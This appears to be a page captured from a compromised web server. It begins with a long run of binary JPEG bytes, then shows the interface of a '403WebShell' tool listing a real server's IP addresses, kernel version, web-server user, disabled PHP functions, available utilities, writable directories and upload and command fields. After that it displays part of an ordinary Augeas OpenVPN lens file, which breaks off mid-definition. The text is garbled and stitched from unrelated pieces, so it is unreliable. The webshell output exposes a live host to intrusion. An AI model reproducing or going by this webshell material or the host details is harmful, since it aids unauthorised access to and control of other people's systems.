JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
403Webshell
Server IP : 13.127.148.211  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ip-172-31-43-195 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/augeas/lenses/dist/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /usr/share/augeas/lenses/dist/openvpn.aug
(* OpenVPN module for Augeas
 Author: Raphael Pinson <raphink@gmail.com>
 Author: Justin Akers <dafugg@gmail.com>

 Reference: http://openvpn.net/index.php/documentation/howto.html
 Reference: https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage

 TODO: Inline file support
*)


module OpenVPN =
  autoload xfm

(************************************************************************
 *                           USEFUL PRIMITIVES
 *************************************************************************)

let eol    = Util.eol
let indent = Util.indent

(* Define separators *)
let sep    = Util.del_ws_spc

(* Define value regexps.
   Custom simplified ipv6 used instead of Rx.ipv6 as the augeas Travis instances
   are limited to 2GB of memory. Using 'ipv6_re = Rx.ipv6' consumes an extra
   2GB of memory and thus the test is OOM-killed.
*)
let ipv6_re = /[0-9A-Fa-f:]+/
let ipv4_re = Rx.ipv4
let ip_re  = ipv4_re|ipv6_re
let num_re = Rx.integer
let fn_re  = /[^#; \t\n][^#;\n]*[^#; \t\n]|[^#; \t\n]/
let fn_safe_re = /[^#; \t\r\n]+/
let an_re  = /[a-z][a-z0-9_-]*/
let hn_re  = Rx.hostname
let port_re = /[0-9]+/
let host_re = ip_re|hn_re
let proto_re = /(tcp|udp)/
let proto_ext_re = /(udp|tcp-client|tcp-server)/
let alg_re = /(none|[A-Za-z][A-Za-z0-9-]+)/
let ipv6_bits_re = ipv6_re . /\/[0-9]+/

(* Define store aliases *)
let ip     = store ip_re
let num    = store num_re
let filename = store fn_re
let filename_safe = store fn_safe_re
let hostname = store hn_re
let sto_to_dquote = store /[^"\n]+/   (* " Emacs, relax *)
let port = store port_re
let host = store host_re
let proto = store proto_re
let proto_ext = store proto_ext_re

(* define comments and empty lines *)
let comment = Util.comment_generic /[ \t]*[;#][ \t]*/ "# "
let comment_or_eol = eol | Util.comment_generic /[ \t]*[;#][ \t]*/ " # "

let empty   = Util.empty


(************************************************************************
 *                               SINGLE VALUES
 *
 *   - local => IP|hostname
 *   - port  => num
 *   - proto => udp|tcp-client|tcp-server
 *   - proto-force => udp|tcp
 *   - mode  => p2p|server
 *   - dev   => (tun|tap)\d*
 *   - dev-node => filename
 *   - ca    => filename
 *   - config => filename
 *   - cert  => filename
 *   - key   => filename
 *   - dh    => filename
 *   - ifconfig-pool-persist => filename
 *   - learn-address => filename
 *   - cipher => [A-Z0-9-]+
 *   - max-clients => num
 *   - user  => alphanum
 *   - group => alphanum
 *   - status => filename
 *   - log   => filename
 *   - log-append => filename
 *   - client-config-dir => filename
 *   - verb => num
 *   - mute => num
 *   - fragment => num
 *   - mssfix   => num
 *   - connect-retry num
 *   - connect-retry-max num
 *   - connect-timeout num
 *   - http-proxy-timeout num
 *   - max-routes num
 *   - ns-cert-type => "server"
 *   - resolv-retry => "infinite"
 *   - script-security => [0-3] (execve|system)?
 *   - ipchange => command
 *   - topology => type
 *************************************************************************)

let single_host = "local" | "tls-remote"
let single_ip   = "lladdr"
let single_ipv6_bits = "iroute-ipv6"
                     | "server-ipv6"
                     | "ifconfig-ipv6-pool"
let single_num = "port"
               | "max-clients"
               | "verb"
               | "mute"
               | "fragment"
               | "mssfix"
               | "connect-retry"
               | "connect-retry-max"
               | "connect-timeout"
               | "http-proxy-timeout"
               | "resolv-retry"
               | "lport"
               | "rport"
               | "max-routes"
               | "max-routes-per-client"
               | "route-metric"
               | "tun-mtu"
               | "tun-mtu-extra"
               | "shaper"
               | "ping"
               | "ping-exit"
               | "ping-restart"
               | "sndbuf"
               | "rcvbuf"
               | "txqueuelen"
               | "link-mtu"
               | "nice"
               | "management-log-cache"
               | "bcast-buffers"
               | "tcp-queue-limit"
               | "server-poll-timeout"
               | "keysize"
               | "pkcs11-pin-cache"
               | "tls-timeout"
               | "reneg-bytes"
               | "reneg-pkts"
               | "reneg-sec"
               | "hand-window"
               | "tran-window"
let single_fn   = "ca"
                | "cert"
                | "extra-certs"
                | "config"
                | "key"
                | "dh"
                | "log"
                | "log-append"
                | "client-config-dir"
                | "dev-node"
                | "cd"
                | "chroot"
                | "writepid"
                | "client-config-dir"
                | "tmp-dir"
                | "replay-persist"
                | "ca"
                | "capath"
                | "pkcs12"
                | "pkcs11-id"
                | "askpass"
                | "tls-export-cert"
                | "x509-track"
let single_an  = "user"
               | "group"
               | "management-client-user"
               | "management-client-group"
let single_cmd = "ipchange"
                | "iproute"
                | "route-up"
                | "route-pre-down"
                | "mark"
                | "up"
                | "down"
                | "setcon"
                | "echo"
                | "client-connect"
                | "client-disconnect"
                | "learn-address"
                | "tls-verify"

let single_entry (kw:regexp) (re:regexp)
               = [ key kw . sep . store re . comment_or_eol ]

let single_opt_entry (kw:regexp) (re:regexp)
                = [ key kw . (sep . store re)? .comment_or_eol ]

let single     = single_entry single_num num_re
      	       | single_entry single_fn  fn_re
	       | single_entry single_an  an_re
	       | single_entry single_host host_re
	       | single_entry single_ip ip_re
           | single_entry single_ipv6_bits ipv6_bits_re
           | single_entry single_cmd fn_re
	       | single_entry "proto"    proto_ext_re
	       | single_entry "proto-force"    proto_re
	       | single_entry "mode"    /(p2p|server)/
               | single_entry "dev"      /(tun|tap)[0-9]*|null/
	       | single_entry "dev-type"      /(tun|tap)/
	       | single_entry "topology"      /(net30|p2p|subnet)/
	       | single_entry "cipher" alg_re
	       | single_entry "auth" alg_re
	       | single_entry "resolv-retry" "infinite"
	       | single_entry "script-security" /[0-3]( execve| system)?/
	       | single_entry "route-gateway" (host_re|/dhcp/)
	       | single_entry "mtu-disc" /(no|maybe|yes)/
	       | single_entry "remap-usr1" /SIG(HUP|TERM)/
	       | single_entry "socket-flags" /(TCP_NODELAY)/
           | single_entry "auth-retry" /(none|nointeract|interact)/
           | single_entry "tls-version-max" Rx.decimal
           | single_entry "verify-hash" /([A-Za-z0-9]{2}:)+[A-Za-z0-9]{2}/
           | single_entry "pkcs11-cert-private" /[01]/
           | single_entry "pkcs11-protected-authentication" /[01]/
           | single_entry "pkcs11-private-mode" /[A-Za-z0-9]+/
           | single_entry "key-method" /[12]/
           | single_entry "ns-cert-type" /(client|server)/
           | single_entry "remote-cert-tls" /(client|server)/

let single_opt  = single_opt_entry "comp-lzo" /(yes|no|adaptive)/
                | single_opt_entry "syslog" fn_re
                | single_opt_entry "daemon" fn_re
                | single_opt_entry "auth-user-pass" fn_re
                | single_opt_entry "explicit-exit-notify" num_re
                | single_opt_entry "engine" fn_re

(************************************************************************
 *                               DOUBLE VALUES
 *************************************************************************)

let double_entry (kw:regexp) (a:string) (aval:regexp) (b:string) (bval:regexp)
    = [ key kw
      . sep . [ label a . store aval ]
      . sep . [ label b . store bval ]
      . comment_or_eol
      ]

let double_secopt_entry (kw:regexp) (a:string) (aval:regexp) (b:string) (bval:regexp)
    = [ key kw
      . sep . [ label a . store aval ]
      . (sep . [ label b . store bval ])?
      . comment_or_eol
      ]


let double  = double_entry "keepalive" "ping" num_re "timeout" num_re
            | double_entry "hash-size" "real" num_re "virtual" num_re
            | double_entry "ifconfig" "local" ip_re "remote" ip_re
            | double_entry "connect-freq" "num" num_re "sec" num_re
            | double_entry "verify-x509-name" "name" hn_re "type"
                /(subject|name|name-prefix)/
            | double_entry "ifconfig-ipv6" "address" ipv6_bits_re "remote" ipv6_re
            | double_entry "ifconfig-ipv6-push" "address" ipv6_bits_re "remote" ipv6_re
            | double_secopt_entry "iroute" "local" ip_re "netmask" ip_re
            | double_secopt_entry "stale-routes-check" "age" num_re "interval" num_re
            | double_secopt_entry "ifconfig-pool-persist"
                "file" fn_safe_re "seconds" num_re
            | double_secopt_entry "secret" "file" fn_safe_re "direction" /[01]/
            | double_secopt_entry "prng" "algorithm" alg_re "nsl" num_re
            | double_secopt_entry "replay-window" "window-size" num_re "seconds" num_re


(************************************************************************
 *                               FLAGS
 *************************************************************************)

let flag_words = "client-to-client"
               | "duplicate-cn"
	       | "persist-key"
	       | "persist-tun"
	       | "client"
	       | "remote-random"
	       | "nobind"
	       | "mute-replay-warnings"
	       | "http-proxy-retry"
	       | "socks-proxy-retry"
           | "remote-random-hostname"
           | "show-proxy-settings"
           | "float"
           | "bind"
           | "nobind"
           | "tun-ipv6"
           | "ifconfig-noexec"
           | "ifconfig-nowarn"
           | "route-noexec"
           | "route-nopull"
           | "allow-pull-fqdn"
           | "mtu-test"
           | "ping-timer-rem"
           | "persist-tun"
           | "persist-local-ip"
           | "persist-remote-ip"
           | "mlock"
           | "up-delay"
           | "down-pre"
           | "up-restart"
           | "disable-occ"
           | "errors-to-stderr"
           | "passtos"
           | "suppress-timestamps"
           | "fast-io"
           | "multihome"
           | "comp-noadapt"
           | "management-client"
           | "management-query-passwords"
           | "management-query-proxy"
           | "management-query-remote"
           | "management-forget-disconnect"
           | "management-hold"
           | "management-signal"
           | "management-up-down"
           | "management-client-auth"
           | "management-client-pf"
           | "push-reset"
           | "push-peer-info"
           | "disable"
           | "ifconfig-pool-linear"
           | "client-to-client"
           | "duplicate-cn"
           | "ccd-exclusive"
           | "tcp-nodelay"
           | "opt-verify"
           | "auth-user-pass-optional"
           | "client-cert-not-required"
           | "username-as-common-name"
           | "pull"
           | "key-direction"
           | "no-replay"
           | "mute-replay-warnings"
           | "no-iv"
           | "use-prediction-resistance"
           | "test-crypto"
           | "tls-server"
           | "tls-client"
           | "pkcs11-id-management"
           | "single-session"
           | "tls-exit"
           | "auth-nocache"
           | "show-ciphers"
           | "show-digests"
           | "show-tls"
           | "show-engines"
           | "genkey"
           | "mktun"
           | "rmtun"


let flag_entry (kw:regexp)
               = [ key kw . comment_or_eol ]

let flag       = flag_entry flag_words


(************************************************************************
 *                               OTHER FIELDS
 *
 *   - server        => IP IP [nopool]
 *   - server-bridge => IP IP IP IP
 *   - route	     => host host [host [num]]
 *   - push          => "string"
 *   - tls-auth      => filename [01]
 *   - remote        => hostname/IP [num] [(tcp|udp)]
 *   - management    => IP num filename
 *   - http-proxy    => host port [filename|keyword] [method]
 *   - http-proxy-option => (VERSION decimal|AGENT string)
 *   ...
 *   and many others
 *
 *************************************************************************)

let server          = [ key "server"
                      . sep . [ label "address" . ip ]
                      . sep . [ label "netmask" . ip ]
                      . (sep . [ key "nopool" ]) ?
                      . comment_or_eol
                      ]

let server_bridge =
    let ip_params = [ label "address" . ip ] . sep
        . [ label "netmask" . ip ] . sep
        . [ label "start"   . ip ] . sep
        . [ label "end"     . ip ] in
            [ key "server-bridge"
            . sep . (ip_params|store /(nogw)/)
            . comment_or_eol
            ]

let route =
    let route_net_kw   = store (/(vpn_gateway|net_gateway|remote_host)/|host_re) in
        [ key "route" . sep
        . [ label "address" . route_net_kw ]
        . (sep . [ label "netmask" . store (ip_re|/default/) ]
            . (sep . [ label "gateway" . route_net_kw ]
                . (sep . [ label "metric" . store (/default/|num_re)] )?
            )?
        )?
        . comment_or_eol
        ]

let route_ipv6 =
    let route_net_re = /(vpn_gateway|net_gateway|remote_host)/ in
        [ key "route-ipv6" . sep
        . [ label "network" . store (route_net_re|ipv6_bits_re) ]
        . (sep . [ label "gateway" . store (route_net_re|ipv6_re) ]
            . (sep . [ label "metric" . store (/default/|num_re)] )?
        )?
        . comment_or_eol
        ]

let push          = [ key "push" . sep
                    . Quote.do_dquote sto_to_dquote
		    . comment_or_eol
                    ]

let tls_auth      = [ key "tls-auth" . sep
                    . [ label "key"       . filename     ] . sep
		    . [ label "is_client" . store /[01]/ ] . comment_or_eol
                    ]

let remote        = [ key "remote" . sep
                    . [ label "server" . host ]
		            . (sep . [label "port" . port]
                        . (sep . [label "proto" . proto]) ? ) ?
                    . comment_or_eol
		    ]

let http_proxy =
    let auth_method_re = /(none|basic|ntlm)/ in
        let auth_method = store auth_method_re in
            [ key "http-proxy"
            . sep . [ label "server" . host ]
